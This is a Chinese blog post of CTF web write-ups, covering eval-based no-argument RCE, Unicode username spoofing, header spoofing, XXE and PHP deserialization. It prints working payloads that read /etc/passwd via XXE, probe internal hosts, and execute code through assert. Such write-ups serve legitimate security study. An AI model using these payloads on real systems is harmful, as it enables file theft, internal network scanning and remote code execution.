1.31刷题记录

最新推荐文章于 2023-01-18 18:53:40 发布
最新推荐文章于 2023-01-18 18:53:40 发布
阅读量142 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51057892/article/details/113447041
版权
这篇博客探讨了多种Web安全漏洞,包括源码泄露、PHP伪协议利用、Unicode欺骗、XML注入等。通过实例展示了如何利用这些漏洞读取敏感文件,如/etc/passwd和/proc/net/arp,并介绍了防御措施。此外,还提到了PHP中的反序列化漏洞利用,以及assert函数在安全中的角色。
摘要由CSDN通过智能技术生成

[GXYCTF2019]禁止套娃

git源码泄露
githack扫一下
在这里插入图片描述

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

php伪协议的函数基本不能用
此题考点是无参数RCE
首先需要得到当前目录下的文件
scandir(’.’)或者scandir(current(localeconv()))均可以读取
再加个print_r就行了

print_r(scandir(current(localeconv())));

在这里插入图片描述

array_reverse()以相反的元素顺序返回数组
pos() 函数返回数组中的当前元素的值。
next() 函数将内部指针指向数组中的下一个元素,并输出
show_source() 函数对文件进行语法高亮显示。
构造payload

?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));

在这里插入图片描述

[HCTF 2018]admin

查看源码发现
在这里插入图片描述
说明用户名是admin
用admin注册,提示用户名已注册
在这里插入图片描述
Unicode欺骗
https://unicode-table.com/en/1D2E/ ,在这个网站上找字符
修改密码模块
在这里插入图片描述
登录模块和注册模块都用strlower()来转小写
strlower()对于特定字符能进行转化

ᴬᴰᴹᴵᴺ -> ADMIN -> admin

在注册的时候 ”ᴬᴰᴹᴵᴺ“ 经过strlower(),转成”ADMIN“ , 在修改密码的时候 ”ADMIN“经过strlower()变成”admin“ , 当我们再次退出登录的时候 ”admin“经过strlower()变成”admin“,能成功登录
注册账号ᴬᴰᴹᴵᴺ,密码123456
在这里插入图片描述
修改密码123
用账号admin,密码123成功登录

在这里插入图片描述

[MRCTF2020]PYWebsite

f12发现flag.php
在这里插入图片描述
访问
在这里插入图片描述
看到IP,猜测本地访问,添加X-Forwarded-For头
在这里插入图片描述

[NCTF2019]True XML cookbook

题目提示很明显XML注入
抓包后添加恶意实体,读取/etc/passwd文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>

<user><username>&admin;</username><password>123546</password></user>

在这里插入图片描述
读取历史操作命令.bash_history失败
在这里插入图片描述
看了大佬的wp,要读取/etc/hosts文件和/proc/net/arp。
/etc/hosts没发现存活主机
在这里插入图片描述
/proc/net/arp 有存活主机
在这里插入图片描述
给了一个主机IP,读取一下:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hacker[
<!ENTITY a SYSTEM "http://10.121.4.2/"> 
]>
<user><username>&a;</username><password>a</password></user>

访问后没有flag
在这里插入图片描述
用bp进行爆破
在这里插入图片描述
在10.121.4.11主机中找到flag
在这里插入图片描述

[NPUCTF2020]ReadlezPHP

查看源码看到php文件
在这里插入图片描述
访问后是一段代码

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}
@$ppp = unserialize($_GET["data"]);
2021-01-31 05:20:35

assert这个函数在php语言中是用来判断一个表达式是否成立
assert()可以将整个字符串参数当作php参数执行。

$b($a)可以构造$b=assert,$a=phpinfo等价于assert(phpinfo())

<?php
error_reporting(1);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$test = new HelloPhp();
$test->b = 'assert';
$test->a = 'phpinfo();';
echo serialize($test);
?>

payload:?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

搜索flag直接找到
在这里插入图片描述

conelly
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfshow(卷王杯)
qq_62046696的博客
09-24 1523
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 1923
CTFSHOW WEB入门 命令执行 web29-48
ctf.show web入门(命令执行)29~56
qq_61768489的博客
01-27 3059
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } preg_match()函数学习一下: preg_match函数是进行正则表达式的匹配,成功返回1,否则返回0 在这个正则里边有一个参数是i,这个在正则
CTFshow命令执行29-123
qq_43534481的博客
08-06 1468
CTFshow命令执行WP
CTF 总结02:preg_match()绕过
最新发布
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
labuladong的刷题笔记V1.31
08-04
【标题】:“labuladong的刷题笔记V1.31” 【描述】:“第三章、暴力搜索算法回溯算法17. 电话号码的字母组合22. 括号生成37. 解数独39. 组合总和46. 全排列77. 组合78. 子集51. N 皇后104. 二叉树的最大深度” 本...
LastActivityView v1.31 查看电脑最近运行记录
01-14
【LastActivityView v1.31 - 电脑活动记录查看工具】 LastActivityView 是一个实用的第三方工具,由 NirSoft 开发,版本号为 v1.31。它专为Windows操作系统设计,允许用户轻松查看计算机上的各种活动记录。这款小巧...
mediawiki-1.31.10.tar.gz
09-29
The 1.31.10 and 1.34.4 versions fix the issue with the backports in the 1.31.9 and the 1.34.3 releases. The patches linked here need applying on top of the previous patches for 1.31.9 and 1.34.3. See...
CurrPorts 1.31 汉化版
03-30
CurrPorts 1.31 汉化版是一款强大的网络监控和管理工具,专为中文用户设计,使得网络连接的管理更加便捷。该软件的主要功能是帮助用户查看系统中的所有TCP/IP和UDP网络连接,以及与这些连接相关联的进程信息,确保...
VoiceRecorder1.31
08-16
无论是用于会议记录、教学讲解还是个人创作,都能得到满意的录音质量。 4. **文件格式支持**:这款录音软件可能支持多种常见的音频文件格式,如WAV、MP3等,用户可以根据实际需要选择保存的文件格式,便于后期编辑...
[NPUCTF2020]ReadlezPHP
qq_54929891的博客
03-16 1905
打开进去就是一张鬼脸,没发现有什么提示,QQ那里跳转的链接是大学介绍,看一会儿F12,如果没有就只能扫描了。 发现了一个神秘的地址,赶紧进去看看 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this-&gt...
ctf php沙箱,详谈CTF中常出现的PHP反序列化漏洞
weixin_39968724的博客
03-16 1021
0x01什么是PHP序列化与反序列化PHP序列化是一种把变量或对象以字符串形式转化以方便储存和传输的方法在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。比方来说,我现在有一个类,我需要通过接口进行数据传输,或存储至数据库中以备将来使用,同时又想保持其结构,让接收方接收或数据库读数据时恢复其原来的结构,就需要通过序列化将对象按照一定格式转化为字符串的形式来进行传输简单...
Matchme php script_php使用preg_match()函数验证ip地址的方法
weixin_31622725的博客
03-09 131
本文实例讲述了php使用preg_match()函数验证ip地址的方法。分享给大家供大家参考,具体如下:代码一、正则实现preg_match('/^(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)(?:[.](?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)){3}$/', $ipAddress);代码二、/**@return Boolen*@pa...
第三十七题——[GXYCTF2019]禁止套娃
分享简单的安全技术
04-23 161
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,没有发现提示,使用dirsearch扫描出了/.git,访问.git获取到了
使用 PHP 正则表达式“preg_match”检查日本内容输入
stwood007的博客
10-08 860
//平假名输入检查 if(!preg_match('/^[ぁ-ん]+$/u', $val)){ //error処理 } //片假名输入检查 if(!preg_match('/^[[ァ-ン]|ー]+$/u', $val)){ //error処理 } //邮件 if(!preg_match('/^[a-zA-Z0-9_\.\-]+@(([a-zA-Z0-9_\.\-]+\.)+[a-zA-Z0-9]+$)/', $val)){ //error処理 } //郵便番号 if(!preg_match(..
CTF-PHP代码审计,正则表达式记录
江湖
06-08 5911
1.flag In the variable ! &lt;?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ ...
web-命令执行
wo41ge的博客
11-11 772
目录web29-过滤关键字web30-增加命令执行函数 web29-过滤关键字 命令执行,需要严格的过滤 进入题目链接 这是源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: h
www.d58.php,php代码审计前奏之ctfshow之命令执行
weixin_34652580的博客
03-11 2046
想搞好代码审计,必须要搞懂其中一些危险函数危险应用,以及过滤不足,故以 CTF 来练习。web29~过滤关键字命令执行,需要严格的过滤源码:data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么 作用web40~无参数读文件...
php正则匹配preg_match,php正则表达式中preg_match函数的详解
weixin_35149412的博客
03-10 1628
我们之前给大家介绍了php正则表达式的使用,入门,以及验证邮箱地址,那么我们今天就想大家介绍php正则表达式中的函数preg_match,preg_match函数在php正则表达式中的规则是怎样的?PHP正则表达式preg_match函数的使用:利用 preg_match(),可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。还有一个可选的第三参数可...
labuladong刷题笔记V1.31:算法精华与数据结构详解
"labuladong的刷题笔记V1.31"是一份全面的IT学习资料,专注于数据结构和算法的讲解与练习。该笔记涵盖了多个章节,从基础数据结构如数组、链表、滑动窗口、前缀和、差分数组,到更进阶的数据结构如二叉树、队列/栈...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值